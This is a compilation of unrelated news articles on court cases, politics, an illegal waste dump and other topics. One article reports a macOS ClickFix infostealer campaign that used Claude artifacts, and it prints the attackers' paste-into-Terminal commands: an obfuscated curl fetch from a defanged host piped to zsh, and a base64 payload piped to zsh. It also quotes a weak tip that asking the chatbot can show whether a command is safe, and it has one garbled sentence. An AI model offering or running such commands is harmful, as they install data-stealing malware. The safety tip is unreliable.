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Brian Flores’ discrimination case against NFL proceeds to open court trial

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The U.S. District Court for the Southern District of New York concluded Friday that Brian Flores, Steve Wilks and Ray Horton’s ongoing discrimination case against the NFL will proceed in open court.

Four years ago, Flores sued the NFL, alleging the league was “rife with racism” as it pertains to its hiring practices for coaches. Wilks and Horton joined the lawsuit after Flores’ initial lawsuit.

“The court’s decision recognizes that an arbitration forum in which the defendant’s own chief executive gets to decide the case would strip employees of their rights under the law,” attorneys Douglas H. Wigdor and David E. Gottlieb said, via ESPN.

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Minnesota Vikings defensive coordinator Brian Flores looks on during the fourth quarter of a game against the Green Bay Packers at U.S. Bank Stadium in Minneapolis, Minnesota, on Jan. 4, 2026. (Matt Blewett/Imagn Images)

“It is long overdue for the NFL to recognize this and finally provide a fair, neutral and transparent forum for these issues to be addressed.”

The NFL fought to move the case into private arbitration, which would have had Commissioner Roger Goodell acting as the judge.

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Defensive coordinator Brian Flores of the Minnesota Vikings looks on prior to a game between the Minnesota Vikings and Green Bay Packers at U.S. Bank Stadium on December 29, 2024 in Minneapolis, Minnesota

Defensive coordinator Brian Flores of the Minnesota Vikings looks on prior to a game between the Minnesota Vikings and the Green Bay Packers at U.S. Bank Stadium in Minneapolis, Minnesota, on Dec. 29, 2024. (Brace Hemmelgarn/Getty Images)

Flores sued the NFL, the Miami Dolphins, New York Giants, Denver Broncos and the Houston Texans. Wilks’ claims are against the Arizona Cardinals, and Ray Horton’s are against the Tennessee Titans.

Flores alleged that NFL teams frequently interview Black head coaching candidates to satisfy the Rooney Rule, conducting “sham interviews.” The Rooney Rule requires teams to interview two external minority candidates for leadership roles.

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Defensive coordinator Brian Flores of the Minnesota Vikings during a game against the Seattle Seahawks at Lumen Field in Seattle Nov. 30, 2025. (Steph Chambers/Getty Images)

Wilks said he was treated as a “bridge coach” during his one-year stint as head coach with the Cardinals and that he didn’t have enough opportunities to succeed in a complaint obtained by Fox News Digital.

Horton alleged he was part of a “sham” interview process when he interviewed for the Titans job in 2016.

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Co-founder of Palestine Action: government’s ban on group ‘backfired’ | Gaza

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Huda Ammori, the co-founder of Palestine Action, says the UK government’s ban has backfired after the High Court ruled that proscribing the group as a “terror” organisation was unlawful.



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Driver guilty of murdering ‘entirely innocent’ boy as he walked along pavement | UK News

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A motorist who mowed down an “entirely innocent” teenager as he walked along a pavement has been found guilty of murder.

Abdullah Yaser Abdullah al Yazidi, 16, was fatally struck by an Audi driven down the wrong side of the road by Zulkernain Ahmed in Sheffield last June.

The victim was thrown in the air by the impact, the city’s crown court heard.

Zulkernain Ahmed
Image: Zulkernain Ahmed

Video footage was shown to jurors of the vehicle on Staniforth Road, in the Darnall area of Sheffield, colliding with who the prosecution said was e-bike rider La’rome Divers, knocking him over a hedge, before hitting Abdullah.

Zulkernain Ahmed was also convicted of causing Mr Divers grievous bodily harm (GBH) with intent and attempting to cause two unidentified riders GBH with intent.

Ahmed, 21; his brother Armaan Ahmed, 27; and Adam Mohammed, 30; had all previously denied murdering Abdullah.

Prosecutors said the defendants, all of Darnall, were out looking for Mr Divers over a dispute about e-bikes.

Zulkernain Ahmed used the car as a “weapon” as he targeted Mr Divers, who was riding with two others – one on a moped and the other on another e-bike, according to prosecutors.

Armaan Ahmed, who was a back seat passenger in the Audi, was cleared of murder but found guilty of manslaughter and of causing GBH to Mr Divers.

Another back seat passenger, Adam Mohammed, 30, was cleared of both murder and manslaughter and a number of other charges.

Armaan Ahmed
Image: Armaan Ahmed

All three defendants were cleared of attempting to murder the three riders after three days of deliberation by the jury of nine women and three men.

A third Ahmed brother, Zain, who police have not traced, was the front seat passenger of the Audi.

Mr Divers, who refused to make a statement to police, was seriously injured in the incident, the court heard.

Abdullah, who was seen throwing and catching a water bottle as he walked along the pavement before the collision on 4 June last year, was “in the wrong place at the wrong time”, said prosecutors.

In his evidence, Zulkernain Ahmed said he was looking for Mr Divers because he was worried he was a threat to his family, and spotted him riding on Staniforth Road.

The defendant, who admitted taking a baseball bat with him, told the jury he only wanted to talk to Mr Divers but “at the last second I got scared and panicked” and decided to “give him a nudge”.

He told the jury: “It was not my intention for anything like this to happen to (Abdullah) or to anyone.”

Armaan Ahmed told police he went with his brother for a meeting about a bike, and he was there to “make sure he was safe”.

Adam Mohammed told police “my sole purpose for getting in the vehicle was to smoke a spliff and then to go play snooker”, the court heard.

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The jury had been told Zulkernain Ahmed had admitted the manslaughter of Abdullah and one charge of causing GBH.

Abdullah’s family said in a statement they welcomed the guilty verdict and were “devastated by our loss”.

Detective Chief Inspector Benjamin Wood, of South Yorkshire Police, said: “Abdullah was an entirely innocent boy who tragically lost his life after being struck by a car on Staniforth Road in June last year.

“He was simply in the wrong place at the wrong time.”

The officer called it a “heartbreaking case which was entirely avoidable”.

The Ahmed brothers will be sentenced on 4 June.



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Tragic loss of beloved actor highlights growing cancer crisis

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James Van Der Beek’s death highlights alarming colon cancer rise in younger adults

→ Daily coffee habit may play role in dementia risk, study finds

‘Doormat Mom’ says she was ‘blindsided’ when her daughter cut her off

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James Van Der Beek’s death at 48 highlights an alarming colon cancer rise in younger adults. (Ray Tamarra/GC Images)

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Quote of the week

“The pain of being cut off — it’s a pain you can’t describe unless you feel it.” 

→ Laura Wellington, a woman in Connecticut known on social media as “Doormat Mom,” shared her story of parent-child estrangement with Fox News Digital.



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Claude LLM artifacts abused to push Mac infostealers in ClickFix attack

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Claude LLM artifacts abused to push Mac infostealers in ClickFix attack

Threat actors are abusing Claude artifacts and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users searching for specific queries.

At least two variants of the malicious activity have been observed in the wild, and more than 10,000 users have accessed the content with dangerous instructions.

A Claude artifact is content generated with Antropic’s LLM that has been made public by the author. It can be anything from instructions, guides, chunks of code, or other types of output that are isolated from the main chat and accessible to anyone via links hosted on the claude.ai domain.

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An artifact’s page warns users that the shown content was generated by the user and has not been verified for accuracy.

Researchers at MacPaw’s investigative division, Moonlock Lab, and at ad-blocking company AdGuard noticed the malicious search results being displayed for multiple queries, like “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew.”

Malicious HomeBrew search results
Malicious HomeBrew search results
Source: AdGuard

Malicious results promoted on Google Search lead to either a public Claude artifact or a Medium article impersonating Apple Support. In both cases, the user is instructed to paste a shell command into Terminal.

  • In the first variant of the attack, the command given for execution is: ‘echo "..." | base64 -D | zsh,’
  • while in the second, it’s: ‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’.
Second variant using a fake Apple Support page
Second variant using a fake Apple Support page
Source: Moonlock Lab

Moonlock researchers discovered that the malicious Claude guide has already received at least 15,600 views, which could be an indication of the number of users falling for the trick.

AdGuard researchers observed the same guide a few days earlier, when it had 12,300 views.

The ClickFix guide hosted on a Claude conversation
The ClickFix guide hosted on a Claude conversation
Source: Moonlock Lab

Running the command in Terminal fetches a malware loader for the MacSync infostealer, which exfiltrates sensitive information present on the system. 

According to the researchers, the malware establishes communication with the command-and-control (C2) infrastructure using a hardcoded token and API key, and spoofs a macOS browser user-agent to blend into normal activity.

“The response is piped directly to osascript – the AppleScript handles the actual stealing (keychain, browser data, crypto wallets),” the researchers say.

The stolen data is packaged into an archive at ‘/tmp/osalogging.zip,’ and then exfiltrated to the attacker’s C2 at a2abotnet[.]com/gate via an HTTP POST request. In case of failure, the archive is split into smaller chunks, and exfiltration is retried eight times. After a successful upload, a cleanup step deletes all traces.

MoonLock Lab found that both variants fetch the second stage from the same C2 address, indicating that the same threat actor is behind the observed activity.

A similar campaign leveraged the chat sharing feature in ChatGPT and Grok to deliver the AMOS infostealer. In December 2025, researchers found the promoted  after researchers found ChatGPT and Grok conversations were being leveraged in ClickFix attacks targeting Mac users.

The Claude variation of the attack indicates that abuse has expanded to other large language models (LLMs).

Users are recommended to exert caution and avoid executing in Terminal commands they don’t fully understand. As Kaspersky researchers noted in the past, asking the chatbot in the same conversation about the safety of the provided commands is a straightforward way to determine if they’re safe or not.

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How deep do Epstein’s ties to Britain’s elite go? | News

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New Epstein files expose his ties to Britain’s elite. Could the fallout shake Keir Starmer’s Labour?

Ex-Prince Andrew was the tip of the iceberg. The latest trove of Epstein files reveals new details about former UK envoy Peter Mandelson’s ‘best pal’ relationship with the convicted sex offender that have pushed Prime Minister Keir Starmer’s Labour into a new crisis. Is this the scandal that defines Labour?

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This episode was produced by Melanie Marich, with Sarí el-Khalili, Chloe Li, Spencer Cline, Maya Hamadeh, Tuleen Barakat, Sonia Bhagat and our host, Malika Bilal. It was edited by Tamara Khandaker.

Our sound designer is Alex Roldan. Our video editors are Hisham Abu Salah and Mohannad al-Melhemm. Alexandra Locke is The Take’s executive producer. Ney Alvarez is Al Jazeera’s head of audio.

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Murder suspect branded police ‘desperate’ when accused of shooting ex-colleague dead, court hears | UK News

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A murder suspect told police they were “desperate” and “just trying to save face” when they accused him of shooting a former colleague dead, a court has heard.

Prosecutors are claiming David Campbell, 77, gunned down former colleague Brian Low, 65, on a remote track near Aberfeldy, Perthshire, on 16 February 2024.

Campbell has pleaded not guilty to eight charges, and has lodged a special defence of alibi in connection with the shotgun murder accusation – claiming he was at home at the time of the alleged shooting.

Both men had worked at Edradynate Estate, where Campbell was head gamekeeper between May 1984 and February 2018 and Mr Low was a groundsman between August 2000 and February 2023.

A general view of the area where Brian Low's body was discovered. Pic: PA
Image: A general view of the area where Brian Low’s body was discovered. Pic: PA

At the High Court in Glasgow on Friday, jurors were shown Campbell’s police interview after he was arrested in May 2024 over Mr Low’s death.

Campbell told Detective Constable David Budd: “They’re just trying to save face.”

It is thought the comment was made regarding a blunder at the beginning of the inquiry, when Police Scotland initially treated the death as a “medical event” despite Mr Low having died of gunshot wounds to the neck and chest.

The mistake meant the crime scene was not sealed off and forensically examined until days after Mr Low’s body was found.

Forensic officers at the scene of the alleged murder in February 2024. Pic: PA
Image: Forensic officers at the scene of the alleged murder in February 2024. Pic: PA

Campbell repeatedly denied any wrongdoing during the interview, telling DC Budd: “I think you’re desperate.”

When once again asked if he shot Mr Low, the accused replied: “I certainly did not.”

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DC Budd agreed with Advocate Depute Greg Farrell that the interview became “heated” and accepted he himself was “quite confrontational”.

Campbell was said to have stated: “Who is this guy Brian Low? Is he the king’s son?”

DC Budd agreed with Mr Farrell that he took it to mean that the accused was suggesting that a lot of money and resources had been put into Mr Low’s case.

Police near the Pitilie Track in February 2024. Pic: Sky News
Image: Police near the Pitilie Track in February 2024. Pic: Sky News

Campbell also told the interviewing officers: “You don’t even know if it was deliberately done or accidentally done.”

The ex-head gamekeeper added: “Some people shoot and get shot every year.”

When told it was a murder inquiry, Mr Campbell replied: “It could have been an accidental killing.”

Charges David Campbell denies

The alleged murder of Brian Low is said to have taken place in Leafy Lane, Aberfeldy, near to the Pitilie Track, on 16 February 2024.

Mr Low’s body was first discovered on 17 February 2024, with a paramedic pronouncing him dead at 9am.

David Campbell is accused of previously showing “malice and ill-will” towards Mr Low, and is alleged to have discharged a shotgun at him, leaving him so severely hurt that he died at the scene.

Prosecutors allege he earlier disabled CCTV cameras at Tigh Na Caorann in Aberfeldy’s Crieff Road in an attempt to conceal his whereabouts.

He is further accused of attempting to defeat the ends of justice between 16 February and 24 May 2024 by disposing of the alleged murder weapon and gun bag; disposing of a Walther Rotex RM8 airgun; having replacement tyres fitted on an electric bike reportedly used during the alleged shooting; and dumping a box, a cartridge bag and bicycle tyres at Aberfeldy Recycling Centre or elsewhere.

Campbell additionally faces five separate breach of the peace charges spanning between July 1995 and September 2012.

He is said to have acted in a disorderly manner, putting three men and two women in a “state of fear and alarm”.

Campbell is further accused of possessing a Walther Rotex RM8 airgun between May 2017 and February 2024 without the relevant certificate, and discharging it on various occasions.

The trial, before Lord Scott, continues.



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Kevin McCarthy blasts Gavin Newsom’s tenure as California governor a ‘failure’

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EXCLUSIVE—Former House Speaker Kevin McCarthy pointed to outmigration from California as evidence of what he described as Gov. Gavin Newsom’s failed leadership of the Golden State in an interview with Fox News Digital on Friday.

“What a failure,” McCarthy said. “You look at how many people left the state, you look how people look at the state, you look at the homelessness, you lool [sic] the major corporations that are generating income here have left. We’re on a downward slope.”

California has led the nation in outbound migration for six years, according to U-Haul. Several corporations, including Chevron, Tesla and Charles Schwab, also moved their California headquarters to other states.

NEWSOM TOUTS CALIFORNIA’S NUMEROUS LEGAL FIGHTS WITH TRUMP ADMINISTRATION IN FINAL STATE OF THE STATE

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Former House Speaker Kevin McCarthy labeled California Gov. Gavin Newsom’s leadership of the state as a “failure.” (K.C. Alfred/The San Diego Union-Tribune via Getty Images; Anna Moneymaker/Getty Images)

When asked whether he believes a Republican could be elected governor in the deep-blue state, McCarthy said it is not off the table due to California’s unique jungle primary system where the top two candidates compete against each other regardless of political party.  

“If Republicans were smart, and they powered on the idea, we could actually come out of the primary with only two Republicans,” he explained. “It’s not any sure thing, but it’s a unique strategy that can work. It’s not fighting with one another; it’s generating more people to come because it’s an open primary.”

McCarthy went on to assess the 11 candidates vying to replace Newsom, who is term-limited, seven of whom recently participated in a debate in San Francisco on Feb. 3.

The former speaker argued Rep. Eric Swalwell, D-Calif., is not capable of being the next governor, while naming Democratic candidate and San Jose Mayor Matt Mahan as one who could “rise up.”

“You look at the Democrats — so many running and so many who are not qualified,” McCarthy said. “Like, Eric Swalwell is not qualified to be governor. He’s not qualified to actually run for governor.”

SHOWDOWN FOR THE HOUSE: DEMOCRATS, REPUBLICANS BRACE FOR HIGH-STAKES MIDTERM CLASH

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Rep. Eric Swalwell, D-Calif., (left) and San Jose Mayor Matt Mahan (right) are running for California governor to replace Gov. Gavin Newsom. (Bill Clark/CQ-Roll Call, Inc via Getty Images; Marla Aufmuth/Getty Images for California Conference for Women)

McCarthy went on to discuss the GOP’s midterm tactics as Republicans begin to outline a strategy for defying the odds in the elections, which are historically difficult for the party in the White House.

While speaking at Harvard University in November, McCarthy explained how the MAGA pull Trump benefited from in the 2024 election does not transfer to his Republican counterparts.

“People think you can just have what President Trump has. No, he’s earned it. He’s earned through a lot of years,” he said. “He’s taken on people before, so they see that strength behind it. You can’t just be anointed. You have to earn where you go.”

REPUBLICAN SENATORS HIT BORDER, TOUTING TOUGHER SECURITY AND TAX CUTS, IN 2026 KICKOFF

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Kevin McCarthy, left, and President Donald Trump, right, walk on the South Lawn of the White House before boarding Marine One in Washington, D.C. on Wednesday, Dec. 17, 2025. (Sloan/Bloomberg via Getty Images)

The former speaker noted infighting within the GOP, criticizing congressional Republicans for wasting key time in having the majority during the government shutdown.

“They’re turning over the floor to Democrats — that’s a bad sign,” McCarthy said. “They’re fighting among themselves.”

He added the record-length government shutdown was a mistake that gave away “two months” of a two-year majority. Republicans are clinging to a tiny advantage in the House right now, and oddsmakers say Democrats are likely to retake control in November.

McCarthy stressed that Republicans must celebrate their political wins in order to have a better chance in the midterms, citing border security as one example.

“When they secured the border, why didn’t you go to the border? Why didn’t you show people, all these people aren’t coming across anymore, that it’s safe,” he said.

CALIFORNIA BILLIONAIRES FLEE STATE’S WEALTH TAX IN THE MOST-PREDICTABLE RESULT EVER

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55th House Speaker Kevin McCarthy at former President Ronald Reagan’s birthday commemoration service at the Ronald Reagan Presidential Library on Feb. 6. 2026. (Nora Moriarty)

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McCarthy said Republicans must show Americans what they’ve accomplished ahead of the 2026 midterms.



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German leader Merz calls on US and Europe to ‘repair trust’ | Newsfeed

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Speaking at the Munich Security Conference, German Chancellor Friedrich Merz said a “deep rift” has opened between Europe and the United States and called to “repair and revive transatlantic trust”.



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This shocking illegal M25 waste site has kept growing – and it now threatens the River Thames | UK News

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Photographs obtained by Sky News appear to show tonnes of rubbish being dumped at what is understood to be the UK’s newest large-scale illegal waste site – despite an ongoing investigation by the Environment Agency.

The huge dump – amounting to tens of thousands of tonnes of rubbish – sits right next to the M25, south east of Epping in Stapleford Tawny.

The Environment Agency says it began an investigation in February 2025, but, despite this, the site remains open – and images show a lorry spilling waste at the dump on Friday 6 February.

The images were captured last week by a local man – who does not want to be named – who stopped because the lorry was stuck in mud.

An image obtained by Sky News shows a lorry dumping waste at the site just last week
Image: An image obtained by Sky News shows a lorry dumping waste at the site just last week

“A massive lorry, 40-foot long – I thought the guy was in trouble, so I thought I’d try to help,” he said.

“I went round the back, and I saw rubbish spewing out from the back of the cab, so I was a bit concerned.”

The man called 999.

The crime costing the economy billions

Sky News has been investigating how, across the country, waste crime is a growing scourge and a booming business being exploited by criminal gangs.

Being paid to remove rubbish, only to dump it illegally without sorting it or paying tax, is an easy way of making huge amounts of money, with poorly-enforced legal repercussions and a huge cost to the environment.

It’s something the previous head of the Environment Agency called “the new narcotics”.

– It’s thought a fifth of all waste in England is being illegally managed

– That’s around 34 million tonnes a year, enough to fill about four million skips

– It costs the economy around a billion pounds a year, with legitimate operators thought to be losing a further £3bn from missed business

Last July, we tracked down a group of suspected organised fly-tippers who waved wads of cash on TikTok after dumping waste in the countryside.

Essex Police confirmed that they had arrested a 55-year-old from Horley in Surrey and a 25-year-old from Mullaghbawn in County Armagh.

The lorry, two mobile phones and a laptop were seized as evidence.

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What it’s like to live next to a 25,000-tonne illegal dump

Satellite imagery analysed by Sky News shows the land in October 2024, when it was green and full of trees.

On 19 September last year, there is clear activity at the site, with possible dumping taking place in the top-left corner of the site.

The site when it was green and full of trees in October 2024
Image: The site when it was green and full of trees in October 2024
It is unrecognisable in September 2025
Image: It is unrecognisable in September 2025

Now the seven-acre site is completely covered in waste, buried several metres deep.

There are major environmental concerns.

Recent ariel images taken by Sky News show the entire site reduced to little more than landfill
Image: Recent ariel images taken by Sky News show the entire site reduced to little more than landfill

The rubbish tumbles down into a small tributary that runs into the River Roding, which feeds the River Thames.

Paul Powlesland, from the River Roding Trust, said: “It’s absolutely heartbreaking to see the sheer scale of this illegal waste dump. I’ve seen a few waste dumps in my time, and this is definitely one of the worst.

“The landfill is literally going into the tributaries, and then, within 100m, that goes straight into the River Roding, London’s third biggest river. So whatever is in here, the rainfall, we’ve been having a lot recently, will go through it, pick up those toxins and go into the groundwater.”

‘Accrid, acidic, toxic puddles litter this site’

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Standing on top of thousands of tonnes of waste, metres deep, it is staggering that it has amassed in just a few months.

Despite the cold winter weather – the stench is acrid, almost acidic at the back of your throat.

What’s here is equally remarkable.

The majority is processed, shredded building waste – often a sign of the work of a organised crime group.

But there is also a lot of domestic rubbish.

Bank statements, postcards, children’s schoolbooks, even official immigration documentation lies blowing the wind. 

What is most disturbing is the metallic-bluey-black liquid puddles dotted around the site.

This toxic looking substance collates as rain falls – and it seeps directly into a tributary into the River Roding.

Sky News understands the Environment Agency is urgently seeking a restriction order to close the site down – and is continuing to gather further evidence.

Barry Russell from the Environment Agency, said: “I share the public’s anger at waste crime, where those responsible have no care for the environment.

“Thanks to the person who rang 999, and the quick work of Essex Police, my environmental crime team are using the arrests and seizures to continue investigating this suspected illegal waste dump.”



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